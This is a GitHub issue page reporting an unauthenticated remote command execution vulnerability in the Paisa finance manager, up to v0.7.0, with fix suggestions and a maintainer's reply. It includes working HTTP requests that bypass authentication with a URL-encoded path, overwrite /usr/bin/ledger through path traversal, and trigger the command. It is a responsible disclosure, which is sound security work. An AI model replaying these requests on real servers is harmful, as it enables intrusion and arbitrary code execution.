search

ananthakumaran / paisa

Paisa – Personal Finance Manager. https://paisa.fyi demo: https://demo.paisa.fyi
https://paisa.fyi
GNU Affero General Public License v3.0
2.49k stars 131 forks source link

paisa <=v0.7.0 web server has an unauthorized remote command execution vulnerability #294

Open pankass opened 1 day ago

pankass commented 1 day ago

Describe your Environment OS: Linux Paisa Version: 0.7.0 App Variant: Docker

Vulnerability description There is a vulnerability in Paisa's authentication mechanism. When the administrator sets up an account, an unauthorized attacker can bypass authentication by url encoding the http request URI, and further use /api/sheets/save to overwrite the /usr/bin/ledger file to complete remote command execution.

To Reproduce Steps to reproduce the behavior:

  1. We can use docker to start a paisa server.
  2. We can restrict unauthorized user access by setting up accounts, but the core authentication middleware has a vulnerability

image image Here c.Request.RequestURI is used to determine the route, but c.Request.RequestURI is the original request URI. The route selection of the gin framework is determined based onc.Request.URL.Path, so we can bypass the detection of this middleware by URL encoding, like this

GET /%61pi/config HTTP/1.1
Host: 127.0.0.1:7500
Connection: close

image

  1. After bypassing authentication, you can use the arbitrary file upload vulnerability of /api/editor/validate to overwrite the /usr/bin/ledger file 
    
POST /%61pi/sheets/save HTTP/1.1
Host: 127.0.0.1:7500
Connection: close
Content-Type: application/json
Content-Length: 60

{"name":"../../../usr/bin/ledger","content":"#!/bin/sh\nid"}

![image](https://github.com/user-attachments/assets/6818d107-b78e-4dcc-b1f7-d69295972d4f)

4. Finally, use `/api/editor/validate` to trigger the execution command

POST /%61pi/editor/validate HTTP/1.1 Host: 127.0.0.1:7500 Connection: close Content-Type: application/json Content-Length: 2

{}


![image](https://github.com/user-attachments/assets/0907585d-7c03-458a-93eb-53f9a9c7db83)

**fix suggestions**
1. [Authentication middleware](https://github.com/ananthakumaran/paisa/blob/8430ad8ec6b7dabbf95fab1c1dae258f8dd319a9/internal/server/server.go#L413) uses `c.Request.URL.Path` to replace `c.Request.RequestURI`.
2. Fixed a directory traversal vulnerability in [SaveSheetFile](https://github.com/ananthakumaran/paisa/blob/8430ad8ec6b7dabbf95fab1c1dae258f8dd319a9/internal/server/sheet.go#L65) due to `../../`
ananthakumaran commented 1 day ago

@pankass Thank you very much for the detailed report. I have pushed a fix to master and plan to release soon. If you are able to verify the fix let me know. Once again, thank you very much for your time.